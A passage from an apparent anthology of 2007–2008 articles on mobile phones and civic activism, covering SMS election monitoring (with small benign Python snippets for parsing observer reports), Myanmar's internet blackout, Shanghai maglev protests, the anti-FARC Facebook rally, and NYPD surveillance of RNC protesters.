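    """Projected vote share for one candidate across the sample."""
    total_votes = sum(s["candidate_x"] + s["candidate_y"] for s in stations)
    return sum(s[candidate] for s in stations) / total_votes

print(round(project_share(sample, "candidate_x"), 3))  # 0.503
```

The statistical care described above lies not in this division but in how the stations are chosen: only a properly random sample makes the projected share a valid estimate of the national result.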

Monitors also report on qualitative data about how well the election
is executed. This may include information on whether polls are opening
on time, whether there are enough ballots available, whether there is
free access to polling places, and whether there is any evidence of
intimidation or any other irregularities.

Reports are transmitted using an agreed-upon set of codes from a
representative sample of polling places around the country. In Sierra
Leone, for example, there are monitors stationed at 500 polling places
in every part of the country who text in reports at regular intervals.

In many contested elections, especially in emerging democracies, speed
of reporting is of the essence. It is critical that NGOs and
independent civil society organizations report data accurately and
quickly even before official results are released, especially when
fraud is feared. Mobile phones have been an important tool in this
regard. They are, of course, not a new phenomenon in election
monitoring; after all, cell phones have been around for a while now.
But prior to NDI showcasing that SMS is a viable and reliable
communication medium in elections, mobile phones were used merely to
transmit reports verbally that then still had to be transcribed in a
time-consuming and error-prone manual process.

Chris Spence, Director of Technology at NDI recalls: “In 2003, we had
24/7 shifts of college students in five locations across Nigeria
entering data from paper forms that were faxed or hand-carried into
the data centers. Timeliness and quality control were huge issues when
nearly 15,000 forms containing dozens of responses each had to be
manually entered into a database. Today, in the elections where we’ve
used SMS, you watch the data flow into the database directly when it
is time for the monitors to report. The system automatically sends
confirmation messages back to the observer in an interactive exchange
of SMS messages, so accuracy increases. At reporting time, it is quite
amazing to see the numbers change on the screen as the sms messages
pour into the database.”
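The interactive confirmation exchange Spence describes could be sketched roughly as follows; the validation rule, station-code prefix, and reply texts are invented here, since the article does not document NDI’s actual system:

```python
# Hypothetical auto-confirmation for incoming observer reports.
# Assumption: a well-formed report is a station code (prefixed "PS")
# followed by a fixed number of observation tokens.

EXPECTED_TOKENS = 5  # station code + four observation codes (assumed)

def confirm(sms: str) -> str:
    """Return the SMS reply the system would send back to the observer."""
    tokens = sms.strip().split()
    if len(tokens) == EXPECTED_TOKENS and tokens[0].startswith("PS"):
        return f"OK {tokens[0]}: report received, thank you."
    return "ERROR: report incomplete, please resend all codes."

print(confirm("PS0423 O1 B1 A0 I2"))  # accepted
print(confirm("O1 B1"))               # rejected, observer asked to resend
```

Echoing a confirmation back over SMS is what closes the loop: the observer learns immediately whether the report parsed, which is why accuracy increases over a one-way fax or voice report.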

In addition to increased speed and greater accuracy of reporting, SMS
election monitoring has a noteworthy ancillary benefit: the real-time
ability by headquarters to communicate with observers throughout the
election day by sending text reminders and updates keeps volunteers
motivated and engaged. SMS and phone contact also provides vital
opportunities for security updates should political conditions take a
turn for the worse.  As a result, morale among the volunteers soars and
there is far less polling-station abandonment.

In order for large-scale SMS election monitoring to succeed, a number
of conditions have to be in place. When NDI assisted an Albanian
consortium of NGOs in the local elections there in 2006, all the right
elements were present: NDI was working with an experienced and
reliable local NGO partner; SMS bulk messaging was available for all
of the mobile phone companies; the phone companies worked with the
NGOs and were available and ready during election day to deal with any
problems on the spot; phone companies and the bulk SMS vendors were
able to handle thousands of messages per minute to a few numbers at
reporting times; wireless coverage even in rural areas was excellent;
and the phone companies provided so-called interconnect ability that
allowed monitors to send messages from all of the different carriers
to one reporting number.

In Sierra Leone where most of the carriers lack international gateway
interconnect ability, the NGO coalition there will need to set up a
series of local phone numbers so that observers can text to a number
within their own provider network.  This necessitates a much more
rudimentary and complicated setup: Seven phones are tethered to a
laptop and observers are texting directly to those phones without any
bulk messaging intermediary.  Messages arrive on the phones and are
passed to the computer, where custom scripts read them, and the data
is compiled into an Access database ready for analysis.  Concerns
about the phones handling a high volume of messages in this situation
necessitate a more complicated reporting strategy whereby each
observer will report all of the data in a single text message using a
simple coding scheme.  Because Sierra Leone has spottier wireless
coverage, election monitors in rural areas will have to travel to
areas where there is coverage to send in their reports at the end of
the day.
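A script of the kind described, turning one coded observer message into a database-ready record, might look something like this; the field codes and message format are invented for illustration, as the actual NEW/NDI coding scheme is not given in the article:

```python
# Hypothetical parser for a single coded observer SMS such as
#   "PS0423 O1 B1 A0 I2"
# read as: polling station 0423, opened on time (O1), ballots
# sufficient (B1), no access problems (A0), two intimidation
# incidents (I2). Codes and fields are invented for illustration.

def parse_report(sms: str) -> dict:
    """Split one coded SMS into a record ready for the database."""
    fields = sms.strip().split()
    station = fields[0]
    if not station.startswith("PS"):
        raise ValueError(f"missing polling-station code: {sms!r}")
    record = {"station": station[2:]}
    for token in fields[1:]:
        code, value = token[0], token[1:]
        record[code] = int(value)
    return record

print(parse_report("PS0423 O1 B1 A0 I2"))
# {'station': '0423', 'O': 1, 'B': 1, 'A': 0, 'I': 2}
```

Packing every observation into one short, rigidly coded message is what makes the single-SMS-per-observer strategy workable on phones that cannot handle high message volumes.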

An important consideration is the cost of a wide-scale program. To
date NDI has found this method of reporting much more economical than
other strategies.  Pricing for bulk SMS from a provider like Clickatell
is relatively inexpensive. In the Albanian election, for example, the
bulk messaging costs for a total of some 41,000 messages received and
sent by 2,100 monitors came to US $2,400 — an extremely
inexpensive way to receive such massive amounts of data.

NDI uses software called SMS Reception Center, built by a developer
in Russia and costing all of $69. NDI tweaked the scripts over
time, and paid the developer to improve the product for its purposes
and specific local conditions.

In addition to the technical issues and costs inherent in running a
large-scale operation, Spence notes a number of strategic issues to
consider: The NGO partner on the ground needs to be experienced in
electoral monitoring, the information collected needs to be suitable
for the limited text-messaging format of 160 characters, and text
messaging needs to be commonly used and part of the local culture.
Notes Spence: “In all the countries we have worked, one thing we do
not have to do is train anyone how to text.”

In Nigeria earlier this year, a local NGO, the Human Emancipation
Project, ran a small-scale citizen monitoring program that used
untrained citizen reporters to send in SMS messages to one number. The
NGO compiled and aggregated the incoming messages and issued a report
after the election. Using a grassroots software tool, Frontline SMS,
organizers reported that about 8,000 individuals texted in some kind
of report. This is a very different method from the systematic
election monitoring conducted by NGO observer organizations and their
technical assistance providers, where a more rigorous protocol is
adhered to. There is merit in engaging everyday citizens to protect
their country’s elections even if these efforts do not produce
reliable and verifiable election results and reports in the manner
that systematic election monitoring does. The Nigerian effort was
widely covered by BBC News and other outlets.

In the two years since the first large-scale SMS monitoring in
Montenegro, there have been rapid improvements in mobile services as
competition in the wireless industry has increased worldwide, and
there is growing interest and understanding on the part of NGOs that
systematic election monitoring is not as difficult as it first may
seem. As election monitoring via SMS becomes standardized and NGOs
gain experience, there is no reason for mobile phones and SMS not to
play a greater role in other areas of civic participation. For
example, imagine citizen oversight of public works projects where
people might report on whether a clinic is actually built as indicated
in a local budget. Other applications may be monitoring and
accountability of elected officials, and dissemination of voter
registration information such as the address of where to register, or
the nearest polling station. Several pilot projects in the United
States showed promising results in increasing voter turnout by text
message reminders. The future is bright for innovative ways in which
cell phones are used by citizens to participate and engage in their
countries as the mobile revolution unfolds.


Moving beyond Nigeria’s mobile rough patch
BY Judy Breck  /  August 27th, 2007

Reuters is reporting this morning that “Nigeria Aims to Let Mobile
Phone Users Keep Numbers.” The plan is to allow subscribers to keep
their numbers as they switch among providers — hopefully to improve
service through competition. The report includes this description of
the roughness of present service in Nigeria, which is interesting to
realize. Mobile has been making a positive transition in Africa in
spite of the problems described below. When mobile service gets
better, the transition should gain important new impetus, one would think.

Nigeria’s booming mobile phone market has grown from scratch to over
30 million subscribers in six years, making it one of the fastest-
growing in the world.

It is seen as having potential for many more years of rapid growth as
Nigeria is Africa’s most populous country with 140 million people, the
majority of whom do not have phones.

However, the quality of service from mobile phone providers has always
been patchy and it has deteriorated over time.

Subscribers often have to dial several times before a call goes
through. Sometimes no calls go through for hours. When they do
connect, the lines are often so bad that callers cannot hear each
other. Calls frequently cut off after a few seconds and text messages
can be delayed by hours.

Mobile operators argue that services are impaired by frequent
blackouts, forcing companies to provide their own power with costly
diesel generators, and constant vandalism and armed attacks on
facilities and staff.


Monks Are Silenced, and for Now, Internet Is, Too
BY Seth Mydans  /  October 4, 2007

BANGKOK, Oct. 3 — It was about as simple and uncomplicated as shooting
demonstrators in the streets. Embarrassed by smuggled video and
photographs that showed their people rising up against them, the
generals who run Myanmar simply switched off the Internet. Until
Friday, television screens and newspapers abroad were flooded with
scenes of tens of thousands of red-robed monks in the streets and of
chaos and violence as the junta stamped out the biggest popular
uprising there in two decades.

But then the images, text messages and postings stopped, shut down by
generals who belatedly grasped the power of the Internet to jeopardize
their crackdown. “Finally they realized that this was their biggest
enemy, and they took it down,” said Aung Zaw, editor of an exile
magazine based in Thailand called The Irrawaddy, whose Web site has
been a leading source of information in recent weeks. The site has
been attacked by a virus whose timing raises the possibility that the
military government has a few skilled hackers in its ranks.

The efficiency of this latest, technological, crackdown raises the
question whether the vaunted role of the Internet in undermining
repression can stand up to a determined and ruthless government — or
whether Myanmar, already isolated from the world, can ride out a
prolonged shutdown more easily than most countries.

OpenNet Initiative, which tracks Internet censorship, has documented
signs that in recent years several governments — including those of
Belarus, Kyrgyzstan and Tajikistan — have closed off Internet access,
or at least opposition Web sites, during periods preceding elections
or times of intense protests. The brief disruptions are known as “just
in time” filtering, said Ronald J. Deibert of OpenNet. They are
designed to quiet opponents while maintaining an appearance of
technical difficulties, thus avoiding criticism from abroad. In 2005,
King Gyanendra of Nepal ousted the government and imposed a weeklong
communications blackout. Facing massive protests, he ceded control in 2006.

Myanmar has just two Internet service providers, and shutting them
down was not complicated, said David Mathieson, an expert on Myanmar
with Human Rights Watch. Along with the Internet, the junta cut off
most telephone access to the outside world. Soldiers on the streets
confiscated cameras and video-recording cellphones. “The crackdown on
the media and on information flow is parallel to the physical
crackdown,” he said. “It seems they’ve done it quite effectively.
Since Friday we’ve seen no new images come out.” In keeping with the
country’s self-imposed isolation over the past half-century, Myanmar’s
military seemed prepared to cut the country off from the virtual world
just as it had from the world at large. Web access has not been
restored, and there is no way to know if or when it might be.

At the same time, the junta turned to the oldest tactic of all to
silence opposition: fear. Local journalists and people caught
transmitting information or using cameras are being threatened and
arrested, according to Burmese exile groups. In a final, hurried
telephone call, Mr. Aung Zaw said, one of his longtime sources said
goodbye. “We have done enough,” he said the source told him. “We can
no longer move around. It is over to you — we cannot do anything
anymore. We are down. We are hunted by soldiers — we are down.”

There are still images to come, Mr. Aung Zaw said, and as soon as he
receives them and his Web site is back up, the world will see them.
But Mr. Mathieson said the country’s dissidents were reverting to
tactics of the past, smuggling images out through cellphones, breaking
the files down for reassembly later. It is not clear how much longer
the generals can hold back the future. Technology is making it harder
for dictators and juntas to draw a curtain of secrecy. “There are
always ways people find of getting information out, and authorities
always have to struggle with them,” said Mitchell Stephens, a
professor of journalism at New York University and the author of “A
History of News.”

“There are fewer and fewer events that we don’t have film images of:
the world is filled with Zapruders,” he said, referring to Abraham
Zapruder, the onlooker who recorded the assassination of President
John F. Kennedy in 1963. Before Friday’s blackout, Myanmar’s hit-and-
run journalists were staging a virtuoso demonstration of the power of
the Internet to outmaneuver a repressive government. A guerrilla army
of citizen reporters was smuggling out pictures even as events were
unfolding, and the world was watching.

“For those of us who study the history of communication technology,
this is of equal importance to the telegraph, which was the first
medium that separated communications and transportation,” said Frank
A. Moretti, executive director of the Center for New Media Teaching
and Learning at Columbia University. Since the protests began in mid-
August, people have sent images and words through SMS text messages
and e-mail and on daily blogs, according to some exile groups that
received the messages. They have posted notices on Facebook, the
social networking Web site. They have sent tiny messages on e-cards.
They have updated the online encyclopedia Wikipedia.

They also used Internet versions of “pigeons” — the couriers that
reporters used in the past to carry out film and reports — handing
their material to embassies or nongovernment organizations with
satellite connections. Within hours, the images and reports were
broadcast back into Myanmar by foreign radio and television stations,
informing and connecting a public that hears only propaganda from its government.

These technological tricks may offer a model to people elsewhere who
are trying to outwit repressive governments. But the generals’ heavy-
handed response is probably a less useful model. Nations with larger
economies and more ties to the outside world have more at stake.
China, for one, could not consider cutting itself off as Myanmar has
done, and so control of the Internet is an industry in itself. “In
China, it’s massive,” said Xiao Qiang, director of the China Internet
Project and an adjunct professor at the graduate school of journalism
at the University of California, Berkeley.

“There’s surveillance and intimidation, there’s legal regulation and
there is commercial leverage to force private Internet companies to
self-censor,” he said. “And there is what we call the Great Firewall,
which blocks hundreds of thousands of Web sites outside of China.” Yet
for all its efforts, even China cannot entirely control the Internet,
an easier task in a smaller country like Myanmar.

As technology makes everyone a potential reporter, the challenge in
risky places like Myanmar will be accuracy, said Vincent Brossel, head
of the Asian section of the press freedom organization Reporters
Without Borders. “Rumors are the worst enemy of independent
journalism,” he said. “Already we are hearing so many strange things.
So if you have no flow of information and the spread of rumors in a
country that is using propaganda — that’s it. You are destroying the
story, and day by day it goes down.” The technological advances on the
streets of Myanmar are the latest in a long history of revolutions in
the transmission of news — from the sailing ship to the telegraph to
international telephone lines and the telex machine to computers and
satellite telephones.

“Today every citizen is a war correspondent,” said Phillip Knightley,
author of “The First Casualty,” a classic history of war reporting
that starts with letters home from soldiers in Crimea in the 1850s and
ends with the “living room war” in Vietnam in the 1970s, the first war
that people could watch on television. “Mobile phones with video of
broadcast quality have made it possible for anyone to report a war,”
he said in an e-mail interview. “You just have to be there. No trouble
getting a start: the broadcasters have been begging viewers to send
their stuff.”


Shanghai’s Middle Class Launches Quiet, Meticulous Revolt
BY Maureen Fan  /  January 26, 2008

SHANGHAI — Bundled against the cold, the businessman made his way
down the steps. Coming toward him in blue mittens was a middle-aged
woman. “Do you know that we’re going to take a stroll this weekend?”
she whispered, using the latest euphemism for the unofficial protests
that have unnerved authorities in Shanghai over the past month. He nodded.

Behind her, protest banners streamed from the windows of high-rise
apartment blocks, signs of middle-class discontent over a planned
extension of the city’s magnetic levitation, or maglev, train through
residential neighborhoods. The couple checked to make sure no
plainclothes police were nearby and discussed where security forces
had been posted in recent days. “Did you take any photos?” the man
asked. Yes, she said, promising to send them to him so he could post
the evidence online. In a minute, the exchange was over, but the news
would soon be added to the steady flow of reports being posted on
blogs and community bulletin boards, as well as in housing compounds
along the proposed extension — which residents contend will bring
noise pollution and possibly dangerous radiation to their homes.

The sudden “strolls” by thousands of office workers, company managers,
young families and the elderly in this sleek financial hub are the
latest chapter in a quiet middle-class battle against government
officials. The protesters are going about their mission carefully, and
many speak anonymously for fear of retribution in a country that
stifles dissent. The Communist Party has a massive security apparatus
that closely monitors what it views as subversive activity. The party
sometimes allows public protests if they serve its political
interests, such as the ouster of corrupt officials.

But the protests here have been unusual. They are led by homeowners
and professionals — people who may not previously have had much to
complain to the government about but whose awareness of their
individual rights has grown along with their prosperity. Police, who
have routinely put down rural protests by poor farmers, have found it
more difficult to intimidate an affluent, educated crowd in a major city.

The demonstrations do have at least one recent precursor, and it is
one Shanghai residents acknowledge using for inspiration. In the
picturesque seaside city of Xiamen, thousands of middle-class
residents have managed at least temporarily to halt the construction
of a $1 billion chemical factory because of environmental concerns.
Demonstrators in that city, in Fujian province, relied on the Internet
and cellphone text messaging to organize strolls and other opposition.
“We learned from Xiamen,” said Gu Qidong, 36, a Shanghai protester and
freelance sales consultant in the health-care industry. “We have no
other way besides this. We once asked if we could apply for a march
permit, and the police said they would never approve it.”

As in Xiamen, Shanghai residents have spent countless hours
researching their cause. They have posted fliers sprinkled with such
phrases as “electromagnetic compatibility” and wooed residents and
news media with slick PowerPoint presentations that question whether a
55-yard-wide safety buffer envisioned for each side of the rail
extension would be sufficient to keep noise and vibration from
reaching their apartments.

They say the existing maglev route, which takes passengers from an out-
of-the-way suburban subway stop to one of the city’s international
airports in less than eight minutes, is a showy waste of money. When
it opened four years ago, they note, the line operated at less than 20
percent capacity; after ticket prices were lowered, it ran at 27
percent capacity.

Armed with knowledge of the law, the Shanghai residents became angry
that public officials had neither given proper notice of their plans
for the extension nor held a public hearing. And so they decided they
had no alternative but to “take a stroll” or “go shopping.” They
started small, and they were careful to say they did not oppose the government.

First, a small group of protesters met at a shopping center the
morning of Jan. 6, shouting “Reject the maglev!” and “We want to
protect our homes!” They left after an hour, regrouping later in a
neighborhood near where the extension would be built.

A few days later, hundreds of people went to a mall that is popular
with tourists and made an evening stop in another affected
neighborhood. By Jan. 12, thousands of people were gathering at
People’s Square and on Nanjing Lu, both high-profile locations in
downtown Shanghai, shouting “People’s police should protect the
people!” and “Save our homes!”

The growing boldness of the protesters has prompted city officials to
emphasize that residents should find “normal” channels to vent their
unhappiness. “We will forestall and defuse social tensions,” Shanghai
Mayor Han Zheng said in his annual government report Thursday, in what
appeared to be a tacit nod to the protesters’ concerns.

After each stroll, residents upload photos and videos to Chinese Web
sites, which are often blocked by the government, and to YouTube, a
site that isn’t. The project has turned neighbors who did not know
each other into close friends and allies who now compare notes and
strategize. “They can’t arrest everybody,” said Yao, a 58-year-old
protester who asked that his full name not be used because he is a
manager at a state-owned enterprise. “We haven’t done anything wrong,”
said Wang Guowei, 51, a manager in a Chinese-Japanese plastics venture
whose family lives near the planned extension. “We always follow the
Chinese constitution, we never violate the law. And in our many
contacts with the police, they say we are within the law.”

A victory for the protesters here does not seem as likely as the one
activists achieved in Xiamen. Proud city officials hope the maglev
extension will further cement Shanghai’s reputation as the mainland’s
most advanced city when the train connects the city’s two airports and
the site of the 2010 World Expo. City officials have already made some
concessions. An original plan to extend the train from Shanghai to the
city of Hangzhou, for example, was scrapped in May. The new extension
proposal announced Dec. 29 lops almost two miles off the old plan, and
one section of track would be underground. But opponents say such
concessions are small.

Critics of the government plan point out that even some residents who
use the train are skeptical of the usefulness of an extension. “I’d
rather see an ordinary railway connecting Pudong international and
Hongqiao airport. It’s cheap, and it’s almost the same convenience,”
said Chen Min, 37, an airline pilot who rides the train each time he
flies abroad. “Does China really need more maglev trains? Does China
really need expensive things?”

Shanghai municipal officials declined requests for comment. At a news
conference this week, government spokeswoman Jiao Yang said Shanghai
Maglev Transportation Development Co., the Shanghai Academy of
Environmental Science and the Municipal Urban Planning Administration
would analyze public opinion “seriously.”

Without the entire city united against the project, residents concede
they are not optimistic the extension will be scrapped. “But we must
insist on our position. We require our government to respect the law,
and public construction must follow a legal framework and the right
procedure,” said the 54-year-old businessman who asked another
protester for her photos. “Our action is a way to wake up people’s
awareness of their civil rights.”

Facebook used to target Colombia’s FARC with global rally

Internet site to spawn protests in 185 cities Monday against rebel
group’s methods
BY Sibylla Brodzinsky  /  February 4, 2008

Bogotá, Colombia – Hundreds of thousands of Colombians are expected to
march throughout the country and in major cities around the world
Monday to protest against this nation’s oldest and most powerful rebel group.

What began as a group of young people venting their rage at the
Revolutionary Armed Forces of Colombia (FARC) on Facebook, an Internet
social-networking site, has ballooned into an international event
called “One Million Voices Against FARC.”

“We expected the idea to resound with a lot of people but not so much
and not so quickly,” says Oscar Morales, who started the Facebook
group against the FARC, which now has 230,000 members. Organizers are
expecting marches in 185 cities around the world.

The event is another example of how technology – such as text
messaging on cellphones – can be used to rally large numbers of people
to a cause. Some observers say it’s less a response to the FARC’s
ideology than it is global public outrage over kidnapping as a weapon.

Colombia continues to be the world’s kidnapping capital with as many
as 3,000 hostages now being held. Anger over the practice has risen in
recent months after two women released by the FARC last month after
six years in captivity recounted the hardships they and other hostages
endured.

Monday’s protests have the support of the government, many
nongovernmental organizations, and some political parties, but their
main battle cry of “No More FARC” has also polarized some Colombians
rather than bringing them together.

While few Colombians support the Marxist insurgent army that has been
fighting the Colombian state for more than 40 years, many people are
uncomfortable with the message of Monday’s rally. They would prefer a
broader slogan against kidnapping and in favor of peace and of
negotiations between the government and the rebels to exchange
hostages for jailed rebels. The leftist Polo Democratico Party said it
will hold a rally in Bogotá in favor of a negotiation but would not
march. Some senators say they will march against Venezuelan President
Hugo Chávez, and other participants say they will be marching in favor
of Colombian President Alvaro Uribe.

Consuelo González de Perdomo, one of the two women released by the
FARC on Jan. 10, said she would not be marching at all.

The families of the 45 remaining FARC hostages will not march either.
“The way the march was called aims to polarize the country,” says
Deyanira Ortiz, whose husband, Orlando Beltrán Cuéllar, has been held
by the FARC for six years. “It’s not for the freedom of the hostages
but against the FARC. And that doesn’t serve any purpose.”

Instead, the families and released FARC hostages will gather in
churches to pray for the release of their loved ones and for a
humanitarian agreement.

Rosa Cristina Parra, one of the original organizers of the march, said
the position of the hostage families is “completely understandable”
and will not detract from the importance of the event. “We cannot
forget the other victims of the FARC, the land-mine victims, the
displaced people,” she says.



NYC, the NYPD, the RNC, and Me
Fortress Big Apple, 2007  /  BY Nick Turse

One day in August, I walked into the Daniel Patrick Moynihan
United States Courthouse in lower Manhattan. Nearly three years before
I had been locked up, about two blocks away, in “the Tombs” — the
infamous jail then named the Bernard B. Kerik Complex for the now-
disgraced New York City Police Commissioner. You see, I am one of the
demonstrators who was illegally arrested by the New York City Police
Department (NYPD) during the protests against the 2004 Republican
National Convention (RNC). My crime had been — in an effort to call
attention to the human toll of America’s wars — to ride the subway,
dressed in black with the pallor of death about me (thanks to
cornstarch and cold cream), and an expression to match, sporting a
placard around my neck that read: WAR DEAD.

I was with a small group and our plan was to travel from Union
Square to Harlem, change trains, and ride all the way back down to
Astor Place. But when my small group exited the train at the 125th
Street station in Harlem, we were arrested by a swarm of police,
marched to a waiting paddy wagon and driven to a filthy detention
center. There, we were locked away for hours in a series of razor-wire-
topped pens, before being bussed to the Tombs.

Now, I was back to resolve the matter of my illegal arrest. As I
walked through the metal detector of the Federal building, a security
official searched my bag. He didn’t like what he found. “You could be
shot for carrying that in here,” he told me. “You could be shot.”

For the moment, however, the identification of that dangerous
object I attempted to slip into the federal facility will have to
wait. Let me instead back up to July 2004, when, with the RNC fast-
approaching, I authored an article on the militarization of Manhattan
— “the transformation of the island into a ‘homeland-security state'”
— and followed it up that September with a street-level recap of the
convention protests, including news of the deployment of an
experimental sound weapon, the Long Range Acoustic Device, by the
NYPD, and the department’s use of an on-loan Fuji blimp as a “spy-in-
the-sky.” Back then, I suggested that the RNC gave New York’s
“finest” a perfect opportunity to “refine, perfect, and implement new
tactics (someday, perhaps, to be known as the ‘New York model’) for
use in penning in or squelching dissent. It offered them the chance to
write up a playbook on how citizens’ legal rights and civil liberties
may be abridged, constrained, and violated at their discretion.”
Little did I know how much worse it could get.

No Escape

Since then, the city’s security forces have eagerly embraced an
Escape From New York-aesthetic — an urge to turn Manhattan into a
walled-in fortress island under high-tech government surveillance,
guarded by heavily armed security forces, with helicopters perpetually
overhead. Beginning in Harlem in 2006, near the site of two new luxury
condos, the NYPD set up a moveable “two-story booth tower, called Sky
Watch,” that gave an “officer sitting inside a better vantage point
from which to monitor the area.” The Panopticon-like structure —
originally used by hunters to shoot quarry from overhead and now also
utilized by the Department of Homeland Security along the Mexican
border — was outfitted with black-tinted windows, a spotlight,
sensors, and four to five cameras. Now, five Sky Watch towers are in
service, rotating in and out of various neighborhoods.

With their 20-25 neighborhood-scanning cameras, the towers are
only a tiny fraction of the Big Apple surveillance story. Back in
1998, the New York Civil Liberties Union (NYCLU) found that there were
“2,397 cameras used by a wide variety of private businesses and
government agencies throughout Manhattan” — and that was just one
borough. About a year after the RNC, the group reported that a survey
of just a quarter of that borough yielded a count of more than 4,000
surveillance cameras of every kind. At about the same time, military-
corporate giant Lockheed Martin was awarded a $212 million contract to
build a “counter-terrorist surveillance and security system for New
York’s subways and commuter railroads as well as bridges and tunnels”
that would increase the camera total by more than 1,000. A year later,
as seems to regularly be the case with contracts involving the
military-corporate complex, that contract had already ballooned to
$280 million, although the system was not to be operational until at
least 2008.

In 2006, according to a Metropolitan Transit Authority (MTA)
spokesman, the MTA already had a “3,000-camera-strong surveillance
system,” while the NYPD was operating “an additional 3,000 cameras”
around the city. That same year, Bill Brown, a member of the
Surveillance Camera Players — a group that leads surveillance-camera
tours and maps their use around the city — estimated, according to a
Newsweek article, that the total number of surveillance cameras in New
York exceeded 15,000 — “a figure city officials say they have no way
to verify because they lack a system of registry.” Recently, Brown
told me that 15,000 was an estimate for the number of cameras in
Manhattan, alone. For the city as a whole, he suspects the count has
now reached about 40,000.

This July, NYPD officials announced plans to up the ante. By the
end of 2007, according to the New York Times, they pledged to install
“more than 100 cameras” to monitor “cars moving through Lower
Manhattan, the beginning phase of a London-style surveillance system
that would be the first in the United States.” This “Ring of Steel”
scheme, which has already received $10 million in funding from the
Department of Homeland Security (in addition to $15 million in city
funds), aims to exponentially decrease privacy because, if “fully
financed, it will include…. 3,000 public and private security
cameras below Canal Street, as well as a center staffed by the police
and private security officers” to monitor all those electronic eyes.

Spies in the Sky

At the time of the RNC, the NYPD was already mounted on police
horses, bicycles, and scooters, as well as an untold number of marked
and unmarked cars, vans, trucks, and armored vehicles, not to mention
various types of water-craft. In 2007, the two-wheeled Segway joined
its list of land vehicles.

Overhead, the NYPD aviation unit, utilizing seven helicopters,
proudly claims to be “in operation 24/7, 365,” according to Deputy
Inspector Joseph Gallucci, its commanding officer. Not only are all
the choppers outfitted with “state of the art cameras and heat-sensing
devices,” as well as “the latest mapping, tracking and surveillance
technology,” but one is a “$10 million ‘stealth bird,’ which has no
police markings — [so] that those on the ground have no idea they are
being watched.”

Asked about concerns over intrusive spying by members of the
aviation unit — characterized by Gallucci as “a bunch of big boys who
like big expensive toys” — Police Commissioner Raymond W. Kelly
scoffed. “We’re not able to, even if we wanted, to look into private
spaces,” he told the New York Times. “We’re looking at public areas.”
However, in 2005, it was revealed that, on the eve of the RNC
protests, members of the aviation unit took a break and used their
night-vision cameras to record “an intimate moment” shared by a
“couple on the terrace of a Second Avenue penthouse.”

Despite this incident, which only came to light because the same
tape included images that had to be turned over to a defendant in an
unrelated trial, Kelly has called for more aerial surveillance. The
commissioner apparently also got used to having the Fuji blimp at his
disposal, though he noted that “it’s not easy to send blimps into the
airspace over New York.” He then “challenged the aerospace industry to
find a solution” that would, no doubt, bring the city closer to life
under total surveillance.

Police Misconduct: The RNC

As a result of its long history of brutality, corruption, spying,
silencing dissent, and engaging in illegal activities, the NYPD is a
particularly secretive organization. As such, the full story of the
department’s misconduct during the Republican National Convention has
yet to be told; but, even in an era of heightened security and
defensiveness, what has emerged hasn’t been pretty.

By April 2005, New York Times journalist Jim Dwyer was already
reporting that, “of the 1,670 [RNC arrest] cases that have run their
full course, 91 percent ended with the charges dismissed or with a
verdict of not guilty after trial. Many were dropped without any
finding of wrongdoing, but also without any serious inquiry into the
circumstances of the arrests, with the Manhattan district attorney’s
office agreeing that the cases should be ‘adjourned in contemplation
of dismissal.'” In one case that went to trial, it was found that
video footage of an arrest had been doctored to bolster the NYPD’s
claims. (All charges were dropped against that defendant. In 400 other
RNC cases, by the spring of 2005, video recordings had either
demonstrated that defendants had not committed crimes or that charges
could not be proved against them.)

Since shifting to “zero-tolerance” law enforcement policies under
Mayor (now Republican presidential candidate) Rudolph Giuliani, the
city has been employing a system of policing where arrests are used to
punish people who have been convicted of no crime whatsoever,
including, as at the RNC or the city’s monthly Critical Mass bike
rides, those who engage in any form of protest. Prior to the Giuliani
era, about half of all those “arrested for low-level offenses would
get a desk-appearance ticket ordering them to go to court.” Now the
proportion is 10%. (NYPD documents show that the decision to arrest
protesters, not issue summonses, was part of the planning process
prior to the RNC.)

Speaking at the 2007 meeting of the American Sociological
Association, Michael P. Jacobson, Giuliani’s probation and correction
commissioner, outlined how the city’s policy of punishing the presumed
innocent works:

“Essentially, everyone who’s arrested in New York City, in the
parlance of city criminal justice lingo, goes through ‘the system’….
if you’ve never gone through the system, even 24 hours — that’s a
shocking period of punishment. It’s debasing, it’s difficult. You’re
probably in a fairly gross police lockup. You probably have no toilet
paper. You’re given a baloney sandwich, and the baloney is green.”

In 2005, the Times’ Dwyer revealed that at public gatherings since
the time of the RNC, police officers had not only “conducted covert
surveillance… of people protesting the Iraq war, bicycle riders taking
part in mass rallies and even mourners at a street vigil for a cyclist
killed in an accident,” but had acted as agent provocateurs. At the
RNC, there were multiple incidents in which undercover agents
influenced events or riled up crowds. In one case, a “sham arrest” of
“a man secretly working with the police led to a bruising
confrontation between officers in riot gear and bystanders.”

In 2006, the Civilian Complaint Review Board (CCRB), reported
“that hundreds of Convention protesters may have been unnecessarily
and unlawfully arrested because NYPD officials failed to give adequate
orders to disperse and failed to afford protesters a reasonable
opportunity to disperse.”

Police Commissioner Kelly had no hesitation about rejecting the
organization’s report. Still, these were strong words, considering the
weakness of the source. The overall impotence of the CCRB suggests a
great deal about the NYPD’s culture of unaccountability. According to
an ACLU report, the board “investigates fewer than half of all
complaints that it reviews, and it produces a finding on the merits in
only three of ten complaints disposed of in any given year.” This
inaction is no small thing, given the surge of complaints against NYPD
officers in recent years. In 2001, before Mayor Bloomberg and Police
Commissioner Kelly came to power, the CCRB received 4,251 complaints.
By 2006, the number of complaints had jumped by 80% to 7,669. Even
more telling are the type of allegations found to be on the rise (and
largely ignored). According to the ACLU, from 2005 to 2006, complaints
over the use of excessive force jumped 26.8% — “nearly double the
increase in complaints filed.”

It was in this context that the planning for the RNC
demonstrations took place. In 2006, in five internal police reports
made public as part of a lawsuit, “New York City police commanders
candidly discuss[ed] how they had successfully used ‘proactive
arrests,’ covert surveillance and psychological tactics at political
demonstrations in 2002, and recommend[ed] that those approaches be
employed at future gatherings.” A draft report from the department’s
Disorder Control Unit had a not-so-startling recommendation, given
what did happen at the RNC: “Utilize undercover officers to distribute
misinformation within the crowds.”

According to Dwyer, for at least a year prior to those
demonstrations, “teams of undercover New York City police officers
traveled to cities across the country, Canada and Europe” to conduct
covert surveillance of activists. “In hundreds of reports, stamped
‘N.Y.P.D. Secret,’ [the NYPD’s] Intelligence Division chronicled the
views and plans of people who had no apparent intention of breaking
the law, [including] street theater companies, church groups and
antiwar organizations, as well as environmentalists and people opposed
to the death penalty, globalization and other government policies.”
Three elected city councilmen — Charles Barron, Bill Perkins and
Larry B. Seabrook — were even cited in the reports for endorsing a
protest event held on January 15, 2004 in honor of Dr. Martin Luther
King Jr.’s birthday.

In August, the New York Times editorial page decried the city’s
continuing attempts to keep documents outlining the police
department’s spying and other covert activities secret:

